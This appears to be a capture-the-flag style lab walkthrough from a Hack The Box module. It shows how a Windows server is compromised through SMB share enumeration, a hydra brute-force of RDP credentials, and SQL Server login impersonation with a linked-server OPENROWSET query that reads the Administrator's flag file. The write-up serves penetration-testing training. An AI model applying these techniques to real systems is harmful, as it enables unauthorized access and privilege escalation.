In this lab, we are tasked with compromising a third internal server within the inlanefreight.htb domain. This server is used to manage files and working materials, such as forms, and it also hosts a database whose purpose is not immediately clear. Our objective is to gain administrative privileges by exploiting vulnerabilities in the server's configuration.
Questions:
- What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)
- Enumerate the target and find a password for the user Fiona. What is her password?
- Once logged in, what other user can we compromise to gain admin privileges?
- Submit the contents of the flag.txt file on the Administrator Desktop.
Steps to Solution
1. Network and Service Enumeration
First, we perform a comprehensive network scan using nmap to identify open ports and running services:
nmap -sV -sC -Pn $TARGET_IP
Results:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
2. SMB Enumeration
To explore the SMB shares available on the target, we use smbclient:
smbclient -N -L //TARGET_IP/
Results:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
Next, we list the contents of the Home share:
smbclient //10.129.XXX.XX/Home
Password for [WORKGROUP\htb-ac-552074]:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> ls
. D 0 Thu Apr 21 16:18:21 2022
.. D 0 Thu Apr 21 16:18:21 2022
HR D 0 Thu Apr 21 15:04:39 2022
IT D 0 Thu Apr 21 15:11:44 2022
OPS D 0 Thu Apr 21 15:05:10 2022
Projects D 0 Thu Apr 21 15:04:48 2022
\HR
. D 0 Thu Apr 21 15:04:39 2022
.. D 0 Thu Apr 21 15:04:39 2022
\IT
. D 0 Thu Apr 21 15:11:44 2022
.. D 0 Thu Apr 21 15:11:44 2022
Fiona D 0 Thu Apr 21 15:11:53 2022
John D 0 Thu Apr 21 16:15:09 2022
Simon D 0 Thu Apr 21 16:16:07 2022
\OPS
. D 0 Thu Apr 21 15:05:10 2022
.. D 0 Thu Apr 21 15:05:10 2022
\Projects
. D 0 Thu Apr 21 15:04:48 2022
.. D 0 Thu Apr 21 15:04:48 2022
\IT\Fiona
. D 0 Thu Apr 21 15:11:53 2022
.. D 0 Thu Apr 21 15:11:53 2022
creds.txt A 118 Thu Apr 21 15:13:11 2022
\IT\John
. D 0 Thu Apr 21 16:15:09 2022
.. D 0 Thu Apr 21 16:15:09 2022
information.txt A 101 Thu Apr 21 16:14:58 2022
notes.txt A 164 Thu Apr 21 16:13:40 2022
secrets.txt A 99 Thu Apr 21 16:15:55 2022
\IT\Simon
. D 0 Thu Apr 21 16:16:07 2022
.. D 0 Thu Apr 21 16:16:07 2022
random.txt A 94 Thu Apr 21 16:16:48 2022
7706623 blocks of size 4096. 3165043 blocks available
smb: \>
For getting files, use command get or mget *. To read use: !cat . Information from these files can be very useful!
smb: \> cd IT/John
smb: \IT\John\> ls
. D 0 Thu Apr 21 16:15:09 2022
.. D 0 Thu Apr 21 16:15:09 2022
information.txt A 101 Thu Apr 21 16:14:58 2022
notes.txt A 164 Thu Apr 21 16:13:40 2022
secrets.txt A 99 Thu Apr 21 16:15:55 2022
7706623 blocks of size 4096. 3141055 blocks available
smb: \IT\John\> mget *
Get file information.txt? y
getting file \IT\John\information.txt of size 101 as information.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
Get file notes.txt? y
getting file \IT\John\notes.txt of size 164 as notes.txt (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file secrets.txt? y
getting file \IT\John\secrets.txt of size 99 as secrets.txt (2.8 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \IT\John\> !cat information.txt
To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.
smb: \IT\John\> !cat notes.txt
Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world ...
smb: \IT\John\> !cat secrets.txt
Password Lists:
1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123
smb: \IT\John\>
Try to use one of these for password attacks.
3. Password Discovery
Using the hydra tool, we brute-force the Remote Desktop Protocol (RDP) service to discover the password for the user Fiona:
hydra -l Fiona -P XXXXX.txt 10.129.xxx.xx rdp
Result:
[3389][rdp] host: 10.129.xxx.xx login: Fiona password: $PASSWORD
4. Remote Desktop Access
With the credentials obtained, we establish an RDP connection:
rdesktop -u Fiona -p '$PASSWORD' $TARGET_IP
5. SQL Server Enumeration and Privilege Escalation
Once connected, we use sqlcmd to enumerate SQL Server tables and execute commands to escalate privileges:
PS C:\Users\Fiona> sqlcmd
1> SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES;
2> go
To escalate privileges, we execute commands as another user and check server roles:
EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go
Finally, to gather more information about the linked servers and their configuration:
SELECT srvname, isremote FROM sysservers;
go
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [local.test.linked.srv];
go
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
go
HTB{46u$**********_$3rv3r$}
By systematically enumerating services, discovering valid credentials, and leveraging SQL Server commands, we were able to compromise multiple user accounts, ultimately gaining administrative access to the server. The contents of the flag.txt file were retrieved from the Administrator's desktop, completing the task.
Top comments (0)